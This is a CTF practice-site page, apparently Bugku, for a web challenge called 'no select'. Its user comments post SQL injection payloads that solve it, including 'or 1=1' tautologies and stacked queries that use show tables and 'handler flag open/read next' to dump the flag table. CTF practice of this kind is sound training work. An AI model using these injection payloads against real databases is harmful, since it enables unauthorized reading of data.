no selectWEB 未解决

分数: 35 金币: 5
题目作者: AL4N233
一  血: 羽义
一血奖励: 5金币
解  决: 2296
提  示:
描  述:
flag{}
评论
dlgz 9月前

bugku' --

回复 0

momomowang 9月前

1' or '1

回复 0

ctfer-pls 10月前

懵逼了,原本还想一步步来,没想到第三步输入1' or '1'='1试了下。。。。。

回复 0

2686213396 10月前

sqlmap发现没有数据表可以进行注入,通过手动注入,bpGET发包id=1‘ or1=1 # 响应结果 中即有flag

回复 0

iNMB 10月前

flag{*****}

回复 0

SLfanCTF 10月前

堆叠注入:?id=1';show databases;use flag;show tables;handler flag open;handler flag read first;handler flag read next;....直到读出flag

回复 1

zhuizhui 11月前

?id=1' or 1=1;#--

回复 1

llc123 1年前

直接用万能密码太没意思了,堆叠语句:?id=1';handler flag open;handler flag read next;这里继续拼接handler flag read next;handler flag close;#

回复 2

冥王 1年前

试了好多评论区下面的都不成功,只有这一个成功了?id=1%27+or+1%3D1%23

回复 0

xxsko 1年前

有哥们通过select编码绕过滤爆出来的吗?我没成功

回复 0
一个姓⎝李⎠的师傅~ 9月前

用 show 查表名,然后堆叠查表内容

回复 0

WriteUp

image
Serim

10 金币

评分(11)

解题动态

汤布里伯 攻破了该题 5小时前
纯情内向小学生 攻破了该题 13小时前
纳百川. 攻破了该题 16小时前
wen yi 攻破了该题 1天前
yezhongyu 攻破了该题 1天前
zhr 攻破了该题 2天前
枫五2233 攻破了该题 3天前
ikunqq 攻破了该题 3天前
1fengxinye 攻破了该题 3天前
放烟花hz 攻破了该题 3天前
A666 攻破了该题 3天前
zhr916 攻破了该题 3天前
HaiDai 攻破了该题 4天前
里耶鸡窝 攻破了该题 4天前
千万 攻破了该题 4天前
zsc1098656370 攻破了该题 4天前
下辈子一定学会 攻破了该题 5天前
ctfer0 攻破了该题 5天前
小黄鸭叮咚 攻破了该题 5天前
cfx 攻破了该题 5天前
问题反馈